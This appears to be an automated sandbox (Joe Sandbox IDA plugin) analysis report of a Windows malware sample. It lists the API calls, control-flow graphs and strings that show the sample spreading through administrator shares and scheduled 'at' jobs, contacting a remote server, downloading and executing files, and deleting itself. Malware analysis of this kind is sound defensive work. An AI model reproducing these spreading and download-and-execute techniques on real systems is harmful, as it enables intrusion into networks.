                                                                                              • Opcode ID: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                                                                              • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                                                                              • Opcode Fuzzy Hash: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                                                                              • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA,administrator,004095E4,00000000), ref: 00402AEC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00402AF5
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00402B04
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00402B07
                                                                                              • LoadLibraryA.KERNELBASE(mpr.dll), ref: 00402B11
                                                                                              • GetProcAddress.KERNEL32(00000000,WNetAddConnection2A), ref: 00402B19
                                                                                              • memset.MSVCRT ref: 00402B36
                                                                                              • lstrcmp.KERNEL32(004030B7,NULL), ref: 00402B46
                                                                                              • sprintf.MSVCRT ref: 00402B64
                                                                                                • Part of subcall function 00402A92: GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                                                                              • sprintf.MSVCRT ref: 00402BA6
                                                                                              • WNetAddConnection2A.MPR(?,004030B7,?,00000000), ref: 00402BDF
                                                                                              • Sleep.KERNELBASE(000000C8), ref: 00402BF5
                                                                                              • memset.MSVCRT ref: 00402C09
                                                                                              • sprintf.MSVCRT ref: 00402C1D
                                                                                              • CopyFileA.KERNEL32(00000000,?,00000000), ref: 00402C3F
                                                                                              • memset.MSVCRT ref: 00402C53
                                                                                              • sprintf.MSVCRT ref: 00402C67
                                                                                              • memset.MSVCRT ref: 00402C9D
                                                                                              • sprintf.MSVCRT ref: 00402CB1
                                                                                              • memset.MSVCRT ref: 00402CE7
                                                                                              • sprintf.MSVCRT ref: 00402CFB
                                                                                              • memset.MSVCRT ref: 00402D2D
                                                                                              • sprintf.MSVCRT ref: 00402D41
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00402D6C
                                                                                              • memset.MSVCRT ref: 00402D7B
                                                                                              • sprintf.MSVCRT ref: 00402DA2
                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00402DAF
                                                                                              • Sleep.KERNEL32(000007D0), ref: 00402DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$AddressLibraryLoadProc$FileSleep$Connection2CopyExecLocalModuleNameTimelstrcmp
                                                                                              • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$administrator$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                                                                              • API String ID: 3609035092-2620952620
                                                                                              • Opcode ID: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                                                                              • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                                                                              • Opcode Fuzzy Hash: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                                                                              • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                                                                                • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                                                                                • Part of subcall function 004059F4: GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                                                                                • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                                                                                • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                                                                                • Part of subcall function 004059F4: RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                                                                              • ExitProcess.KERNEL32 ref: 004059EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCtrlDispatcherExitLibraryLoadOpenProcProcessServiceStartStartup_mbscat_mbscpy
                                                                                              • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                                                                              • API String ID: 3970724158-1370363722
                                                                                              • Opcode ID: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                                                                              • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                                                                              • Opcode Fuzzy Hash: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                                                                              • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 40407c-40410c Sleep LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 404044 2 404111-404119 0->2 3 40464f-404653 2->3 4 40411f-404151 call 403492 memset call 406090 call 4034e5 2->4 11 404153 4->11 12 40415a-404161 4->12 11->12 13 404163 12->13 14 404167-40416e 12->14 13->14 15 404170 14->15 16 404174-4041bc memcpy send 14->16 15->16 17 4041c2-404238 16->17 18 404646 16->18 19 40423d-404268 memset call 403758 17->19 18->3 22 40463d 19->22 23 40426e-40428b call 403758 19->23 22->18 23->22 26 404291-40429a 23->26 27 4042a0 26->27 28 404418-40441b 26->28 29 404654-404665 OpenMutexA 27->29 30 4042a6-4042a8 27->30 31 404421-404423 28->31 32 404589-404621 GetTickCount wsprintfA LoadLibraryA GetProcAddress 28->32 37 404675-404755 call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 29->37 38 404667-40466f ReleaseMutex CloseHandle 29->38 33 4043c8-40440d lstrcpyn call 403135 30->33 34 4042ae-4042af 30->34 35 404425-404427 31->35 36 404497-4044a8 OpenMutexA 31->36 66 404623-404626 32->66 67 404628 32->67 49 404412-404413 33->49 40 4042b5-4042b6 34->40 41 404347-4043c6 lstrcpyn lstrlen lstrcpyn call 403280 34->41 35->19 42 40442d-404492 GetDesktopWindow ShellExecuteA 35->42 43 4044b8-40457e call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 36->43 44 4044aa-4044b2 ReleaseMutex CloseHandle 36->44 38->37 50 4042b8-4042b9 40->50 51 4042d9-404342 lstrcpyn lstrlen lstrcpyn call 403311 40->51 41->49 42->19 79 404584 43->79 80 40475b-404849 call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 43->80 44->43 49->19 50->19 54 4042bb-4042cc 50->54 51->49 54->19 58 4042d2-4042d4 54->58 58->19 70 40462a-404638 WinExec 66->70 67->70 70->19 79->19
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00004650), ref: 0040408D
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004040CB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004040D4
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004040E0
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004040E3
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004040F2
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004040F5
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404104
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00404107
                                                                                                • Part of subcall function 00404044: socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                                                                                • Part of subcall function 00404044: connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                                                                                • Part of subcall function 00404044: closesocket.WS2_32(00000000), ref: 0040406A
                                                                                                • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                                                                                • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                                                                              • memset.MSVCRT ref: 00404135
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                                                                                • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                                                                                • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                                                                                • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                                                                                • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                                                                              • memcpy.MSVCRT(?,?,000000B0), ref: 00404193
                                                                                              • send.WS2_32(?,?,00000000), ref: 004041B3
                                                                                              • memset.MSVCRT ref: 0040424A
                                                                                              • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 004042EB
                                                                                              • lstrlen.KERNEL32(00409328,00000200), ref: 004042F7
                                                                                              • lstrcpyn.KERNEL32(004093A8,?), ref: 0040430A
                                                                                              • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 0040439B
                                                                                              • lstrlen.KERNEL32(004090E0,00000080), ref: 004043A7
                                                                                              • lstrcpyn.KERNEL32(00409160,?), ref: 004043BA
                                                                                              • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 004043DA
                                                                                              • GetDesktopWindow.USER32 ref: 00404485
                                                                                              • ShellExecuteA.SHELL32(00000000), ref: 0040448C
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040449E
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004044AB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004044B2
                                                                                              • wsprintfA.USER32 ref: 00404539
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404557
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404562
                                                                                              • GetTickCount.KERNEL32 ref: 004045C4
                                                                                              • wsprintfA.USER32 ref: 004045D7
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 004045F5
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404600
                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00404632
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040465B
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 00404668
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040466F
                                                                                              • memset.MSVCRT ref: 0040468A
                                                                                              • sprintf.MSVCRT ref: 0040472B
                                                                                              • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404740
                                                                                                • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                                                                                • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                                                                                • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                                                                                • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                                                                                • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                                                                                • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                                                                                • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                                                                                • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                                                                              • ExitProcess.KERNEL32 ref: 00404755
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnectmemcpysendsetsockoptsocketsprintf
                                                                                              • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                                                                              • API String ID: 2150264698-2364854850
                                                                                              • Opcode ID: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                                                                              • Instruction ID: 67642873343b6f7d73ea264a9ba1336f7ce8e91893947de594fae40b13c7bc8e
                                                                                              • Opcode Fuzzy Hash: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                                                                              • Instruction Fuzzy Hash: 16329771D042C8EEEB11DBA4CD48BDE7FB96B55304F0400A9E144B7292C7BE5A58CB7A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 86 4048aa-404947 Sleep LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 40484f 89 404e7d-404e81 86->89 90 40494d-40497f call 403492 memset call 406090 call 4034e5 86->90 97 404981 90->97 98 404988-40498f 90->98 97->98 99 404991 98->99 100 404995-40499c 98->100 99->100 101 4049a2-4049ea memcpy send 100->101 102 40499e 100->102 103 4049f0-404a66 101->103 104 404e74 101->104 102->101 105 404a6b-404a8c memset call 4037ea 103->105 104->89 107 404a91-404a96 105->107 108 404e6b 107->108 109 404a9c-404ab9 call 4037ea 107->109 108->104 109->108 112 404abf-404ac8 109->112 113 404c46-404c49 112->113 114 404ace 112->114 117 404db7-404e4f GetTickCount wsprintfA LoadLibraryA GetProcAddress 113->117 118 404c4f-404c51 113->118 115 404e82-404e93 OpenMutexA 114->115 116 404ad4-404ad6 114->116 121 404ea3-404f83 call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 115->121 122 404e95-404e9d ReleaseMutex CloseHandle 115->122 123 404bf6-404c3b lstrcpyn call 403135 116->123 124 404adc-404add 116->124 153 404e51-404e54 117->153 154 404e56 117->154 119 404c53-404c55 118->119 120 404cc5-404cd6 OpenMutexA 118->120 119->105 125 404c5b-404cc0 GetDesktopWindow ShellExecuteA 119->125 126 404ce6-404dac call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 120->126 127 404cd8-404ce0 ReleaseMutex CloseHandle 120->127 122->121 137 404c40-404c41 123->137 131 404ae3-404ae4 124->131 132 404b75-404bf4 lstrcpyn lstrlen lstrcpyn call 403280 124->132 125->105 165 404db2 126->165 166 404f89-405077 call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 126->166 127->126 133 404ae6-404ae7 131->133 134 404b07-404b70 lstrcpyn lstrlen lstrcpyn call 403311 131->134 132->137 133->105 138 404ae9-404afa 133->138 134->137 137->105 138->105 143 404b00-404b02 138->143 143->105 156 404e58-404e66 WinExec 153->156 154->156 156->105 165->105
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00004650), ref: 004048BB
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004048F9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00404902
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 0040490E
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00404911
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00404920
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00404923
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404932
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00404935
                                                                                                • Part of subcall function 0040484F: htons.WS2_32(00001F9A), ref: 00404861
                                                                                                • Part of subcall function 0040484F: socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                                                                                • Part of subcall function 0040484F: connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                                                                                • Part of subcall function 0040484F: closesocket.WS2_32(00000000), ref: 0040489A
                                                                                                • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                                                                                • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                                                                              • memset.MSVCRT ref: 00404963
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                                                                                • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                                                                                • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                                                                                • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                                                                                • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                                                                              • memcpy.MSVCRT(?,?,000000B0), ref: 004049C1
                                                                                              • send.WS2_32(?,?,00000000), ref: 004049E1
                                                                                              • memset.MSVCRT ref: 00404A78
                                                                                              • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00404B19
                                                                                              • lstrlen.KERNEL32(00409328,00000200), ref: 00404B25
                                                                                              • lstrcpyn.KERNEL32(004093A8,?), ref: 00404B38
                                                                                              • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00404BC9
                                                                                              • lstrlen.KERNEL32(004090E0,00000080), ref: 00404BD5
                                                                                              • lstrcpyn.KERNEL32(00409160,?), ref: 00404BE8
                                                                                              • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00404C08
                                                                                              • GetDesktopWindow.USER32 ref: 00404CB3
                                                                                              • ShellExecuteA.SHELL32(00000000), ref: 00404CBA
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404CCC
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 00404CD9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404CE0
                                                                                              • wsprintfA.USER32 ref: 00404D67
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404D85
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404D90
                                                                                              • GetTickCount.KERNEL32 ref: 00404DF2
                                                                                              • wsprintfA.USER32 ref: 00404E05
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404E23
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404E2E
                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00404E60
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404E89
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 00404E96
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404E9D
                                                                                              • memset.MSVCRT ref: 00404EB8
                                                                                              • sprintf.MSVCRT ref: 00404F59
                                                                                              • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404F6E
                                                                                                • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                                                                                • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                                                                                • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                                                                                • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                                                                                • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                                                                                • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                                                                                • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                                                                                • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                                                                              • ExitProcess.KERNEL32 ref: 00404F83
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnecthtonsmemcpysendsetsockoptsocketsprintf
                                                                                              • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                                                                              • API String ID: 2152970890-2364854850
                                                                                              • Opcode ID: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                                                                              • Instruction ID: 34a9ccf79dfd8e924b7e3463a5d7c06d8bd6e6ee9c35ded2589a275d78ef8857
                                                                                              • Opcode Fuzzy Hash: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                                                                              • Instruction Fuzzy Hash: 4B32A771D042C8EEEB11DBA4CD48BDEBFB96B55304F0400A9E144B7292C7BE5A58CB79

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 172 40387c-40390e LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 40336c 175 403e44-403e48 172->175 176 403914-403946 call 403492 memset call 406090 call 4034e5 172->176 183 403948 176->183 184 40394f-403956 176->184 183->184 185 403958 184->185 186 40395c-403963 184->186 185->186 187 403965 186->187 188 403969-4039b1 memcpy send 186->188 187->188 189 4039b7-403a2d 188->189 190 403e3b 188->190 191 403a32-403a53 memset call 4036c6 189->191 190->175 193 403a58-403a5d 191->193 194 403e32 193->194 195 403a63-403a80 call 4036c6 193->195 194->190 195->194 198 403a86-403a8f 195->198 199 403a95 198->199 200 403c0d-403c10 198->200 201 403e49-403e5a OpenMutexA 199->201 202 403a9b-403a9d 199->202 203 403c16-403c18 200->203 204 403d7e-403e16 GetTickCount wsprintfA LoadLibraryA GetProcAddress 200->204 209 403e6a-403f4a call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 201->209 210 403e5c-403e64 ReleaseMutex CloseHandle 201->210 205 403aa3-403aa4 202->205 206 403bbd-403c02 lstrcpyn call 403135 202->206 207 403c1a-403c1c 203->207 208 403c8c-403c9d OpenMutexA 203->208 237 403e18-403e1b 204->237 238 403e1d 204->238 212 403aaa-403aab 205->212 213 403b3c-403bbb lstrcpyn lstrlen lstrcpyn call 403280 205->213 219 403c07-403c08 206->219 207->191 214 403c22-403c87 GetDesktopWindow ShellExecuteA 207->214 215 403cad-403d73 call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 208->215 216 403c9f-403ca7 ReleaseMutex CloseHandle 208->216 210->209 220 403aad-403aae 212->220 221 403ace-403b37 lstrcpyn lstrlen lstrcpyn call 403311 212->221 213->219 214->191 251 403f50-40403e call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 215->251 252 403d79 215->252 216->215 219->191 220->191 226 403ab0-403ac1 220->226 221->219 226->191 230 403ac7-403ac9 226->230 230->191 242 403e1f-403e2d WinExec 237->242 238->242 242->191 252->191
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004038C0
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004038C9
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004038D5
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004038D8
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004038E7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004038EA
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 004038F9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004038FC
                                                                                                • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
